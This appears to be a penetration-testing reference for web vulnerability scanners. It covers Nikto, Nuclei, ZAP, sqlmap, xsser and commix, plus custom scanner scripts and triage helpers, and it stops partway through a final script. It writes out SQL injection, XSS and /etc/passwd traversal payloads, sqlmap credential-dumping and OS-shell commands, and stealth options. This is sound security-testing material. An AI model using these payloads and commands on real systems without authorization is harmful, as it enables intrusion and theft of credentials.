Vulnerability Scanner Tools

Command reference for web application vulnerability scanners (Nikto, Wapiti, Nuclei, OWASP ZAP, sqlmap, xsser, commix), followed by two small custom scanner scripts and notes on throttling, output triage and troubleshooting. Flags are given as the tools actually accept them; where a tool has no flag for a task, the alternative is shown.

Nikto

Basic Vulnerability Scanning

# Basic vulnerability scan
nikto -h http://TARGET_URL

# With HTTPS
nikto -h https://TARGET_URL

# With specific port (or: nikto -h TARGET_URL -p 8080)
nikto -h http://TARGET_URL:8080

# With multiple hosts (-h also accepts a text file, one host or URL per line)
nikto -h hosts.txt

# With output file (format inferred from the extension, or set with -Format)
nikto -h http://TARGET_URL -o results.txt

# With XML output
nikto -h http://TARGET_URL -Format xml -o results.xml

# With JSON output
nikto -h http://TARGET_URL -Format json -o results.json

# With verbose output (-Display V; -v is not a Nikto flag)
nikto -h http://TARGET_URL -Display V

# Non-interactive run for scripts/CI (Nikto has no silent mode; this disables the keyboard prompts)
nikto -h http://TARGET_URL -nointeractive

Advanced Nikto Options

# With specific plugins (semicolon-separated; list available plugins with -list-plugins)
nikto -h http://TARGET_URL -Plugins "apacheusers;backdoors"

# With all plugins (macros: @@ALL, @@DEFAULT, @@NONE)
nikto -h http://TARGET_URL -Plugins @@ALL

# With excluded plugins (prefix a plugin name with - to remove it from a macro)
nikto -h http://TARGET_URL -Plugins "@@DEFAULT;-apacheusers"

# With custom user agent
nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# With cookies: no CLI flag; set STATIC-COOKIE in a copy of nikto.conf and load that file
#   nikto.conf:  STATIC-COOKIE="PHPSESSID=abc123"
nikto -h http://TARGET_URL -config ./nikto.conf

# With HTTP authentication (Basic/NTLM)
nikto -h http://TARGET_URL -id admin:password

# With proxy
nikto -h http://TARGET_URL -useproxy http://127.0.0.1:8080

# With per-request timeout (seconds)
nikto -h http://TARGET_URL -timeout 10

# With a pause between tests and a hard cap on scan time (Nikto has no retry flag)
nikto -h http://TARGET_URL -Pause 2 -maxtime 1h

# With SSL forced on or off (-ssl and -nossl are mutually exclusive)
nikto -h TARGET_URL -p 8443 -ssl
nikto -h TARGET_URL -p 8080 -nossl

# With specific check categories (-Tuning). Valid characters:
#   1 interesting files, 2 misconfiguration, 3 information disclosure,
#   4 injection (XSS/script/HTML), 5 remote file retrieval inside web root,
#   6 denial of service, 7 remote file retrieval server-wide, 8 command execution,
#   9 SQL injection, 0 file upload, a authentication bypass, b software identification,
#   c remote source inclusion, x = reverse (run everything except the listed categories)
nikto -h http://TARGET_URL -Tuning 49
nikto -h http://TARGET_URL -Tuning x6

Wapiti

Basic Vulnerability Scanning

# Basic vulnerability scan
wapiti -u http://TARGET_URL

# With HTTPS
wapiti -u https://TARGET_URL

# With specific port
wapiti -u http://TARGET_URL:8080

# With output file (the default report format is html; choose the format with -f)
wapiti -u http://TARGET_URL -f txt -o results.txt

# With XML output
wapiti -u http://TARGET_URL -f xml -o results.xml

# With JSON output
wapiti -u http://TARGET_URL -f json -o results.json

# With verbose output (-v takes a level: 0 quiet, 1 print each URL, 2 print each attack)
wapiti -u http://TARGET_URL -v 2

# With quiet output (-s is the start-URL option, not silence)
wapiti -u http://TARGET_URL -v 0

Advanced Wapiti Options

# With specific modules (list them with --list-modules)
wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf"

# With all modules
wapiti -u http://TARGET_URL -m all

# With excluded modules (prefix a module name with - to deactivate it)
wapiti -u http://TARGET_URL -m "all,-sql"

# With custom user agent (uppercase -A; lowercase -a is authentication)
wapiti -u http://TARGET_URL -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# With cookies: Wapiti reads a JSON cookie file; wapiti-getcookie submits the login form and writes one
wapiti-getcookie -u http://TARGET_URL/login.php -c cookies.json -d "username=admin&password=password"
wapiti -u http://TARGET_URL -c cookies.json

# With HTTP authentication (credentials are login%password, separated by %)
wapiti -u http://TARGET_URL -a "admin%password" --auth-type basic

# With proxy
wapiti -u http://TARGET_URL -p http://127.0.0.1:8080

# With timeout (seconds)
wapiti -u http://TARGET_URL -t 10

# With crawl depth and an overall scan-time cap in seconds (Wapiti has no retry flag)
wapiti -u http://TARGET_URL -d 3 --max-scan-time 1800

# With SSL verification disabled (the default) or enabled
wapiti -u https://TARGET_URL --verify-ssl 0
wapiti -u https://TARGET_URL --verify-ssl 1

# With the crawl restricted to a folder and URLs excluded (keeps the scanner away from logout links)
wapiti -u http://TARGET_URL --scope folder -x "http://TARGET_URL/logout*"

Nuclei

Basic Vulnerability Scanning

# Basic vulnerability scan (runs every installed template)
nuclei -u http://TARGET_URL

# With HTTPS
nuclei -u https://TARGET_URL

# With specific port
nuclei -u http://TARGET_URL:8080

# With multiple targets (one per line)
nuclei -l targets.txt

# With output file
nuclei -u http://TARGET_URL -o results.txt

# With JSON Lines output (-jsonl in nuclei v3; the v2 flag was -json)
nuclei -u http://TARGET_URL -jsonl -o results.jsonl

# With verbose output
nuclei -u http://TARGET_URL -v

# With silent output (findings only, no banner or progress)
nuclei -u http://TARGET_URL -silent

Advanced Nuclei Options

# Keep the template set current before scanning
nuclei -update-templates

# With a specific template file (-t takes a file or directory path)
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml

# With all templates in a directory (with no -t at all, every installed template runs)
nuclei -u http://TARGET_URL -t templates/

# With templates selected by tag or severity rather than path
nuclei -u http://TARGET_URL -tags sqli,xss
nuclei -u http://TARGET_URL -severity critical,high

# With excluded templates or tags
nuclei -u http://TARGET_URL -t templates/ -exclude-templates templates/sql-injection.yaml
nuclei -u http://TARGET_URL -exclude-tags dos,fuzz

# With custom user agent (any header goes through -H)
nuclei -u http://TARGET_URL -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# With cookies
nuclei -u http://TARGET_URL -H "Cookie: PHPSESSID=abc123"

# With authentication (base64 of admin:password)
nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ="

# With proxy
nuclei -u http://TARGET_URL -proxy http://127.0.0.1:8080

# With timeout (seconds)
nuclei -u http://TARGET_URL -timeout 10

# With retries
nuclei -u http://TARGET_URL -retries 3

# With TLS: Nuclei does not verify certificates by default, so self-signed targets need no extra flag (-k is not a Nuclei option)
nuclei -u https://TARGET_URL

# With several specific templates, plus concurrency (-c) and a request-rate cap (-rl)
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml -c 10 -rl 50

OWASP ZAP

Basic Vulnerability Scanning

# Basic (passive) baseline scan
zap-baseline.py -t http://TARGET_URL

# Same scan from the official container, writing reports to the current directory
docker run --rm -v "$(pwd):/zap/wrk/:rw" -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py -t http://TARGET_URL -r results.html

# With HTTPS
zap-baseline.py -t https://TARGET_URL

# With specific port
zap-baseline.py -t http://TARGET_URL:8080

# With HTML report
zap-baseline.py -t http://TARGET_URL -r results.html

# With XML report
zap-baseline.py -t http://TARGET_URL -x results.xml

# With JSON report
zap-baseline.py -t http://TARGET_URL -J results.json

# With debug output (-d; there is no -v flag)
zap-baseline.py -t http://TARGET_URL -d

# With short output (no PASS lines or example URLs)
zap-baseline.py -t http://TARGET_URL -s

Advanced OWASP ZAP Options

# Rule configuration: generate a config file listing every rule, edit it, then scan with it.
# Each line is "rule-id<TAB>IGNORE|WARN|FAIL<TAB>(rule name)", e.g.
#   10020	IGNORE	(X-Frame-Options Header Not Set)
# (-P is the ZAP listen port, not a policy file.)
zap-baseline.py -t http://TARGET_URL -g rules.conf
zap-baseline.py -t http://TARGET_URL -c rules.conf

# Include the alpha passive scan rules as well
zap-baseline.py -t http://TARGET_URL -a

# Custom user agent, passed to ZAP itself via -z (ZAP config key connection.defaultUserAgent)
zap-baseline.py -t http://TARGET_URL -z "-config connection.defaultUserAgent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'"

# Cookies / authentication: there is no cookie or credential flag. Define the session in a ZAP
# context file exported from the GUI (authentication method, session management, users) and
# name the user to scan as. (-u is a config URL, not a user.)
zap-baseline.py -t http://TARGET_URL -n app.context -U admin

# Upstream proxy (e.g. chaining through Burp), also via ZAP config keys
zap-baseline.py -t http://TARGET_URL -z "-config connection.proxyChain.enabled=true -config connection.proxyChain.hostName=127.0.0.1 -config connection.proxyChain.port=8080"

# Spider for 5 minutes, give up after 30 minutes overall, and wait up to 30 s for passive scanning to drain
zap-baseline.py -t http://TARGET_URL -m 5 -T 30 -D 30

# Report only WARN and FAIL, and do not fail the job on warnings (CI-friendly)
zap-baseline.py -t http://TARGET_URL -l WARN -I

# Active checks: the baseline scan is passive only; use zap-full-scan.py for active scanning
zap-full-scan.py -t http://TARGET_URL -r full-report.html

Custom Scripts

Python Vulnerability Scanner

import queue
import re
import threading
import time
from urllib.parse import urlencode

import requests

SQL_PAYLOADS = ["'", "\"", "';", "\";", "' OR 1=1--", "\" OR 1=1--"]
# Specific DBMS error fragments; matching the bare word "error" flags almost every page
SQL_ERROR_RE = re.compile(
    r"you have an error in your sql syntax|warning: mysql|pg_query\(|syntax error at or near"
    r"|ora-\d{5}|unclosed quotation mark|sqlite3?\.operationalerror",
    re.I,
)
XSS_PAYLOADS = ["<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>"]
TRAVERSAL_PAYLOADS = ["../", "..\\", "....//", "....\\\\"]


def vulnerability_scanner(url, wordlist_file, threads=10, delay=0):
    """Request every path in wordlist_file with a few canned payloads and print
    heuristic hits. Output is an indicator only; confirm each hit manually."""
    work = queue.Queue()
    session = requests.Session()
    base = url.rstrip('/')

    def fetch(full_url, params):
        # Let requests URL-encode the payload: raw quotes/spaces in a URL are rejected by many servers
        try:
            return session.get(full_url, params=params, timeout=5, allow_redirects=False).text
        except requests.RequestException:
            return ""

    def worker():
        while True:
            path = work.get()
            if path is None:            # sentinel: no more work
                work.task_done()
                break
            try:
                full_url = f"{base}/{path.strip('/')}"

                # SQL Injection check (error-based heuristic)
                for payload in SQL_PAYLOADS:
                    if SQL_ERROR_RE.search(fetch(full_url, {"id": payload})):
                        print(f"[SQL Injection?] {full_url}?{urlencode({'id': payload})}")
                        break

                # XSS check: payload reflected verbatim (an HTML-escaped reflection does not match)
                for payload in XSS_PAYLOADS:
                    if payload in fetch(full_url, {"search": payload}):
                        print(f"[XSS?] {full_url}?{urlencode({'search': payload})}")
                        break

                # Directory traversal check: repeat the sequence so it climbs out of a nested document root,
                # and require a real passwd root entry rather than any text containing "root:"
                for payload in TRAVERSAL_PAYLOADS:
                    probe = payload * 5 + "etc/passwd"
                    if re.search(r"^root:.*:0:0:", fetch(full_url, {"file": probe}), re.M):
                        print(f"[Directory Traversal?] {full_url}?{urlencode({'file': probe})}")
                        break

                time.sleep(delay)
            finally:
                work.task_done()

    # Start worker threads
    workers = [threading.Thread(target=worker, daemon=True) for _ in range(threads)]
    for t in workers:
        t.start()

    # Queue the paths (skip blank and comment lines), then one sentinel per worker
    with open(wordlist_file) as f:
        for line in f:
            line = line.strip()
            if line and not line.startswith('#'):
                work.put(line)
    for _ in workers:
        work.put(None)

    # Wait for completion
    work.join()


# Usage
if __name__ == "__main__":
    vulnerability_scanner("http://TARGET_URL", "/usr/share/wordlists/dirb/common.txt", threads=20, delay=0.1)
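The three checks in the script above are only as good as their response matching, and the loose versions (the word "error", the raw payload, the string "root:") generate most of the false positives. The following classifiers, an added example that is not part of the original page, tighten each one: real DBMS error signatures, a distinction between raw and HTML-escaped reflection, and a genuine passwd root-entry pattern. The sample response bodies are constructed; drop the functions into the scanner in place of the inline `in` tests.

```python
"""Response classifiers for heuristic web checks (added example; sample bodies are constructed)."""
import html
import re
from typing import Optional

# Error fragments the major DBMSs actually emit when a quote breaks the query
DB_ERRORS = {
    "MySQL": re.compile(r"You have an error in your SQL syntax|Warning: mysql_", re.I),
    "PostgreSQL": re.compile(r"ERROR:\s+syntax error at or near|pg_query\(", re.I),
    "MSSQL": re.compile(r"Unclosed quotation mark after the character string|OLE DB Provider for SQL Server", re.I),
    "Oracle": re.compile(r"ORA-\d{5}", re.I),
    "SQLite": re.compile(r"SQLite3?::SQLException|sqlite3\.OperationalError", re.I),
}


def sql_error_signature(body: str) -> Optional[str]:
    """Return the DBMS whose error text appears in the body, else None.
    Keying on a specific error string is what stops the scanner from flagging
    every page that merely contains the word 'error'."""
    for dbms, pattern in DB_ERRORS.items():
        if pattern.search(body):
            return dbms
    return None


def reflection_kind(body: str, canary: str) -> Optional[str]:
    """Classify how an injected canary comes back:
    'raw'     -> byte-for-byte (the candidate for reflected XSS)
    'escaped' -> only after HTML entity encoding (the app encoded it; not XSS on its own)
    None      -> not reflected at all."""
    if canary in body:
        return "raw"
    if html.escape(canary, quote=True) in body or html.escape(canary, quote=False) in body:
        return "escaped"
    return None


# A real /etc/passwd root entry: name, any password field, uid 0, gid 0
PASSWD_LINE = re.compile(r"^root:[^:]*:0:0:", re.M)


def looks_like_passwd(body: str) -> bool:
    """True only for an actual passwd root line, not for prose that contains 'root:'."""
    return PASSWD_LINE.search(body) is not None


# Constructed sample responses covering the true-positive and false-positive cases
SAMPLES = {
    "mysql_error": "<h1>Oops</h1>You have an error in your SQL syntax; check the manual ...",
    "generic_error": "<p>An error occurred while processing your request.</p>",
    "xss_raw": "<div>Results for <script>alert('XSS')</script></div>",
    "xss_escaped": "<div>Results for &lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;</div>",
    "passwd": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
    "chroot_docs": "Use root: as a prefix in the config file.",
}


def classify_all(samples: dict) -> dict:
    """Run every classifier over every sample; returns {name: (dbms, reflection, is_passwd)}."""
    canary = "<script>alert('XSS')</script>"
    return {
        name: (sql_error_signature(body), reflection_kind(body, canary), looks_like_passwd(body))
        for name, body in samples.items()
    }


if __name__ == "__main__":
    for name, (dbms, refl, pw) in classify_all(SAMPLES).items():
        print(f"{name:14} -> dbms={dbms} reflection={refl} passwd={pw}")
```

The "escaped" verdict is the one worth keeping separate: a scanner that only tests `payload in body` never sees it, while a scanner that tests for the payload's characters individually reports it as XSS even though the application encoded the output correctly.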

Bash Vulnerability Scanner

#!/bin/bash

TARGET_URL="http://TARGET_URL"
WORDLIST="/usr/share/wordlists/dirb/common.txt"
THREADS=10

# Check one path for the three vulnerability classes
check_vulnerabilities() {
    local path=$1
    local full_url="${TARGET_URL}/${path}"
    # -G with --data-urlencode makes curl URL-encode the payload; quotes and spaces placed
    # directly in the URL would otherwise produce malformed requests
    local curl_opts=(-s -G --connect-timeout 5 --max-time 10)
    local payload response probe

    # SQL Injection check (error-based heuristic; specific DBMS strings, not the bare word "error")
    local sql_payloads=("'" "\"" "';" "\";" "' OR 1=1--" "\" OR 1=1--")
    for payload in "${sql_payloads[@]}"; do
        response=$(curl "${curl_opts[@]}" --data-urlencode "id=${payload}" "$full_url")
        if echo "$response" | grep -qiE "sql syntax|warning: mysql|ora-[0-9]{5}|unclosed quotation mark"; then
            echo "[SQL Injection?] ${full_url}?id=${payload}"
        fi
    done

    # XSS check: payload reflected verbatim. -F treats the payload as a fixed string, not a regex
    local xss_payloads=("<script>alert('XSS')</script>" "<img src=x onerror=alert('XSS')>")
    for payload in "${xss_payloads[@]}"; do
        response=$(curl "${curl_opts[@]}" --data-urlencode "search=${payload}" "$full_url")
        if echo "$response" | grep -qF -- "$payload"; then
            echo "[XSS?] ${full_url}?search=${payload}"
        fi
    done

    # Directory traversal check: repeat the sequence to climb out of a nested document root,
    # and require a real passwd root entry (uid 0, gid 0) rather than any "root:"
    local traversal_payloads=("../" "..\\" "....//" "....\\\\")
    for payload in "${traversal_payloads[@]}"; do
        probe="${payload}${payload}${payload}${payload}${payload}etc/passwd"
        response=$(curl "${curl_opts[@]}" --data-urlencode "file=${probe}" "$full_url")
        if echo "$response" | grep -qE "^root:[^:]*:0:0:"; then
            echo "[Directory Traversal?] ${full_url}?file=${probe}"
        fi
    done
}

# Export the function and the variable it reads so GNU parallel's child shells see them
export -f check_vulnerabilities
export TARGET_URL

# Run the check over the wordlist in parallel, skipping blank and comment lines
grep -vE '^[[:space:]]*(#|$)' "$WORDLIST" | parallel -j "$THREADS" check_vulnerabilities {}

Vulnerability Types

SQL Injection

# Basic SQL injection test (GET parameter)
sqlmap -u "http://TARGET_URL/page.php?id=1"

# With POST data (the form fields become the injection candidates)
sqlmap -u "http://TARGET_URL/login.php" --data="username=admin&password=admin"

# With cookies
sqlmap -u "http://TARGET_URL/page.php?id=1" --cookie="PHPSESSID=abc123"

# With custom headers and user agent
sqlmap -u "http://TARGET_URL/page.php?id=1" --headers="X-Forwarded-For: 127.0.0.1" --user-agent="CustomAgent"

# With proxy (useful for reviewing the exact requests in Burp)
sqlmap -u "http://TARGET_URL/page.php?id=1" --proxy="http://127.0.0.1:8080"

# With HTTP authentication
sqlmap -u "http://TARGET_URL/page.php?id=1" --auth-type=basic --auth-cred="admin:password"

# Non-interactive run with deeper tests (answers prompts with defaults; level/risk widen the payload set)
sqlmap -u "http://TARGET_URL/page.php?id=1" --batch --level=3 --risk=2

# Database enumeration, narrowing with -D/-T/-C at each step ("appdb" is a placeholder name)
sqlmap -u "http://TARGET_URL/page.php?id=1" --dbs
sqlmap -u "http://TARGET_URL/page.php?id=1" -D appdb --tables
sqlmap -u "http://TARGET_URL/page.php?id=1" -D appdb -T users --columns
sqlmap -u "http://TARGET_URL/page.php?id=1" -D appdb -T users -C username,password --dump

# With OS shell (needs stacked queries or file-write privileges on the DBMS; writes files to the
# target and is highly intrusive, so only with explicit authorization covering it)
sqlmap -u "http://TARGET_URL/page.php?id=1" --os-shell
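What the probes above actually do to a query, as an added example that is neither from the original page nor from the sqlmap project: a constructed in-memory SQLite users table is queried through a string-concatenated login and through a parameterised one. The table, rows and credentials are made up; `probe` reports each attempt the way an error-based scanner observes it (a row count on success, the DBMS error text when the statement breaks), which is exactly the signal sqlmap's first single-quote request is looking for.

```python
"""SQL injection cause and fix side by side (added example; table and credentials are constructed)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table with two made-up accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("admin", "s3cret"), ("alice", "hunter2")])
    con.commit()
    return con


def login_vulnerable(con, username: str, password: str) -> list:
    """String-concatenated query: user input is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE username = '{username}' AND password = '{password}'"
    return [row[0] for row in con.execute(sql)]


def login_safe(con, username: str, password: str) -> list:
    """Parameterised query: input is bound as data and can never change the statement."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]


def probe(login, con, username: str, password: str) -> str:
    """Summarise an attempt as a scanner sees it: 'rows:<n>' or 'error:<dbms message>'."""
    try:
        return f"rows:{len(login(con, username, password))}"
    except sqlite3.OperationalError as exc:
        return f"error:{exc}"


def demo() -> dict:
    """Run the same inputs through both logins; returns {case: (vulnerable_result, safe_result)}."""
    con = make_db()
    cases = {
        "legit":        ("admin", "s3cret"),
        "wrong_pw":     ("admin", "nope"),
        "bypass":       ("admin' OR 1=1--", "anything"),    # -- comments out the password check
        "tautology":    ("' OR '1'='1", "' OR '1'='1"),      # every row satisfies the WHERE clause
        "syntax_probe": ("'", ""),                           # the lone quote sqlmap sends first
    }
    return {name: (probe(login_vulnerable, con, u, p), probe(login_safe, con, u, p))
            for name, (u, p) in cases.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name:13} vulnerable={vuln:45} safe={safe}")
```

The "syntax_probe" row is the one the scanners on this page key on: the vulnerable query raises a DBMS error that leaks into the response, while the parameterised query simply returns no rows. The "bypass" and "tautology" rows show why an authentication form is a high-value injection point even when no error is displayed.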

XSS (Cross-Site Scripting)

# Basic XSS test: -u is the base URL, -g the GET path; the literal XSS marks the injection point
xsser -u "http://TARGET_URL" -g "/page.php?search=XSS"

# With POST data (-p; again XSS marks where payloads are inserted)
xsser -u "http://TARGET_URL/login.php" -p "username=XSS&password=XSS"

# With cookies
xsser -u "http://TARGET_URL" -g "/page.php?search=XSS" --cookie="PHPSESSID=abc123"

# With custom user agent (xsser has no generic --headers option)
xsser -u "http://TARGET_URL" -g "/page.php?search=XSS" --user-agent="CustomAgent"

# With proxy
xsser -u "http://TARGET_URL" -g "/page.php?search=XSS" --proxy="http://127.0.0.1:8080"

# With HTTP authentication
xsser -u "http://TARGET_URL" -g "/page.php?search=XSS" --auth-type="basic" --auth-cred="admin:password"

# With a custom payload
xsser -u "http://TARGET_URL" -g "/page.php?search=XSS" --payload="<script>alert('XSS')</script>"

# With encoded payloads (--Str = String.fromCharCode(), --Hex = hex escapes; there is no --encode flag)
xsser -u "http://TARGET_URL" -g "/page.php?search=XSS" --Str
xsser -u "http://TARGET_URL" -g "/page.php?search=XSS" --Hex

Command Injection

# Basic command injection test
commix -u "http://TARGET_URL/page.php?cmd=test"

# Restrict testing to one parameter
commix -u "http://TARGET_URL/page.php?cmd=test&id=1" -p cmd

# With POST data
commix -u "http://TARGET_URL/login.php" --data="username=admin&password=admin"

# With cookies
commix -u "http://TARGET_URL/page.php?cmd=test" --cookie="PHPSESSID=abc123"

# With custom headers and user agent
commix -u "http://TARGET_URL/page.php?cmd=test" --headers="X-Forwarded-For: 127.0.0.1" --user-agent="CustomAgent"

# With proxy
commix -u "http://TARGET_URL/page.php?cmd=test" --proxy="http://127.0.0.1:8080"

# With HTTP authentication
commix -u "http://TARGET_URL/page.php?cmd=test" --auth-type="basic" --auth-cred="admin:password"

# Non-interactive, running a single command instead of dropping into the interactive
# pseudo-shell that commix opens by default on success (there is no --os-shell flag)
commix -u "http://TARGET_URL/page.php?cmd=test" --batch --os-cmd="id"

Best Practices

Rate Limiting

# Pause between Nikto tests (seconds); -timeout is only the per-request socket timeout
nikto -h http://TARGET_URL -Pause 2

# Limit Nuclei concurrency (-c) and requests per second (-rl); -t selects templates, not threads
nuclei -u http://TARGET_URL -c 10 -rl 50

# Spread requests across proxies (-proxy takes a comma-separated list or a file)
nuclei -u http://TARGET_URL -proxy http://proxy1:8080,http://proxy2:8080

# Cap Wapiti's total scan time (seconds)
wapiti -u http://TARGET_URL --max-scan-time 1800

Stealth Mode

# Browser-like user agent (the default Nikto and Nuclei agents identify the tool)
nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
nuclei -u http://TARGET_URL -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Low request rate
nuclei -u http://TARGET_URL -rl 5 -c 2
nikto -h http://TARGET_URL -Pause 5

# Run only the checks you need instead of the whole template set
nuclei -u http://TARGET_URL -tags sqli,xss
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml

# Caveat: these reduce volume, not detectability. Nikto's probe paths and most Nuclei
# templates are signatured by WAFs and IDS regardless of user agent or rate.

Output Analysis

# Save results to file
nikto -h http://TARGET_URL -o results.txt
nuclei -u http://TARGET_URL -jsonl -o results.jsonl

# Filter by severity: Nuclei carries a severity field (Nikto's text output does not)
nuclei -u http://TARGET_URL -severity critical,high
jq -r 'select(.info.severity == "high") | [.info.severity, .["template-id"], .["matched-at"]] | @tsv' results.jsonl

# Count Nuclei findings per template
jq -r '.["template-id"]' results.jsonl | sort | uniq -c | sort -rn

# Search Nikto output by vulnerability type (case-insensitive; Nikto does not label findings by class)
grep -i "sql" results.txt
grep -iE "xss|cross-site" results.txt
grep -iE "command|shell" results.txt
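For anything beyond a one-line grep, parsing the JSON Lines file is more reliable than text matching. The following triage script is an added example that is not part of the original page: it parses Nuclei-shaped JSONL (template-id, info.severity, matched-at, host), skips non-JSON lines such as banner text mixed into a redirected stream, de-duplicates repeated findings, filters by a minimum severity and summarises per host. The sample lines are constructed, the hosts are placeholders, and the template ids are illustrative.

```python
"""Triage of Nuclei JSON Lines output (added example; sample lines are constructed)."""
import json
from collections import Counter, defaultdict

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4, "unknown": 5}

# Constructed sample in Nuclei's JSONL shape: one duplicate and one non-JSON line on purpose
SAMPLE_JSONL = """\
{"template-id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 Path Traversal","severity":"critical"},"type":"http","host":"http://app.example.test","matched-at":"http://app.example.test/cgi-bin/.%2e/.%2e/etc/passwd"}
{"template-id":"tech-detect","info":{"name":"Wappalyzer Technology Detection","severity":"info"},"type":"http","host":"http://app.example.test","matched-at":"http://app.example.test","matcher-name":"apache"}
{"template-id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 Path Traversal","severity":"critical"},"type":"http","host":"http://app.example.test","matched-at":"http://app.example.test/cgi-bin/.%2e/.%2e/etc/passwd"}
{"template-id":"http-missing-security-headers","info":{"name":"HTTP Missing Security Headers","severity":"info"},"type":"http","host":"http://api.example.test","matched-at":"http://api.example.test","matcher-name":"content-security-policy"}
this line is not json and should be skipped
{"template-id":"sqli-error-based","info":{"name":"Error based SQL injection","severity":"high"},"type":"http","host":"http://api.example.test","matched-at":"http://api.example.test/items?id=1'"}
"""


def parse_jsonl(text):
    """Yield one finding dict per valid JSON line; malformed lines are skipped, not fatal."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def dedupe(findings):
    """Collapse repeated (template-id, matched-at) pairs, which retries and
    clustered templates can emit more than once."""
    seen, unique = set(), []
    for f in findings:
        key = (f.get("template-id"), f.get("matched-at"))
        if key not in seen:
            seen.add(key)
            unique.append(f)
    return unique


def severity(f):
    return f.get("info", {}).get("severity", "unknown").lower()


def triage_nuclei(text, min_severity="low"):
    """Return (findings at or above min_severity, most severe first; {host: {severity: count}})."""
    cutoff = SEVERITY_RANK[min_severity]
    kept = [f for f in dedupe(parse_jsonl(text)) if SEVERITY_RANK.get(severity(f), 5) <= cutoff]
    kept.sort(key=lambda f: (SEVERITY_RANK.get(severity(f), 5), f.get("host", ""), f.get("template-id", "")))
    per_host = defaultdict(Counter)
    for f in kept:
        per_host[f.get("host", "?")][severity(f)] += 1
    return kept, {host: dict(counts) for host, counts in per_host.items()}


if __name__ == "__main__":
    findings, summary = triage_nuclei(SAMPLE_JSONL, min_severity="low")
    for f in findings:
        print(f"{severity(f):8} {f['template-id']:32} {f['matched-at']}")
    for host, counts in summary.items():
        print(host, counts)
```

Run it against a real file with `triage_nuclei(open("results.jsonl").read(), "medium")`; the per-host summary is the table to paste into a report, and the de-duplication step matters because a single template can match the same URL several times across retries.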

Troubleshooting

Common Issues

# Connection timeout: raise the per-request timeout (and let Nuclei retry)
nikto -h http://TARGET_URL -timeout 30
nuclei -u http://TARGET_URL -timeout 30 -retries 3

# Too many requests (HTTP 429, WAF blocking, dropped connections): slow down
nuclei -u http://TARGET_URL -rl 10 -c 5
nikto -h http://TARGET_URL -Pause 3

# Invalid or self-signed certificate: Nuclei and Wapiti skip verification by default; curl needs -k
curl -k https://TARGET_URL/
wapiti -u https://TARGET_URL --verify-ssl 0

# Authentication required: send the session cookie or an Authorization header with every request
nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ="
nuclei -u http://TARGET_URL -H "Cookie: PHPSESSID=abc123"
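The custom scanners earlier on this page have neither a request-rate cap nor any reaction to a 429 or 503, so they are the scripts most likely to hit the "too many requests" case above and the rate-limiting advice under Best Practices. The following helpers, an added example that is not part of the original page, supply both: a fixed-rate throttle shared by all worker threads, and a back-off decision that honours Retry-After (delta-seconds or HTTP-date) and otherwise falls back to capped exponential delay. Only the timing decisions are implemented; the HTTP call stays with the caller, and the clock and sleep functions are injectable assumptions so the logic runs without real waiting.

```python
"""Throttle and 429/503 back-off helpers for a threaded scanner (added example)."""
import threading
import time
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Optional


def retry_after_seconds(headers: dict, now: Optional[datetime] = None) -> Optional[float]:
    """Parse Retry-After: either delta-seconds ('120') or an HTTP-date (RFC 7231)."""
    raw = headers.get("Retry-After") or headers.get("retry-after")
    if raw is None:
        return None
    raw = raw.strip()
    if raw.isdigit():
        return float(raw)
    try:
        when = parsedate_to_datetime(raw)
    except (TypeError, ValueError):
        return None
    now = now or datetime.now(timezone.utc)
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return max(0.0, (when - now).total_seconds())


def backoff_seconds(status: int, headers: dict, attempt: int, base: float = 1.0,
                    cap: float = 60.0, now: Optional[datetime] = None) -> Optional[float]:
    """Seconds to wait before retrying, or None if the response is not retryable.
    429 and 503 honour Retry-After when present, else exponential back-off capped at `cap`."""
    if status not in (429, 503):
        return None
    ra = retry_after_seconds(headers, now)
    if ra is not None:
        return min(ra, cap)
    return min(cap, base * (2 ** attempt))


class Throttle:
    """Fixed-rate limiter: at most `rps` requests per second across all threads.
    `clock`/`sleep` default to the real ones; tests inject fakes."""

    def __init__(self, rps: float, clock=time.monotonic, sleep=time.sleep):
        self.interval = 1.0 / rps
        self.clock, self.sleep = clock, sleep
        self.lock = threading.Lock()
        self.next_slot = clock()
        self.waited = 0.0            # total seconds spent sleeping, for reporting

    def wait(self) -> float:
        """Block until the next slot is free; returns how long this call slept."""
        with self.lock:
            now = self.clock()
            delay = max(0.0, self.next_slot - now)
            self.next_slot = max(now, self.next_slot) + self.interval
        if delay:
            self.sleep(delay)
            self.waited += delay
        return delay


def demo() -> dict:
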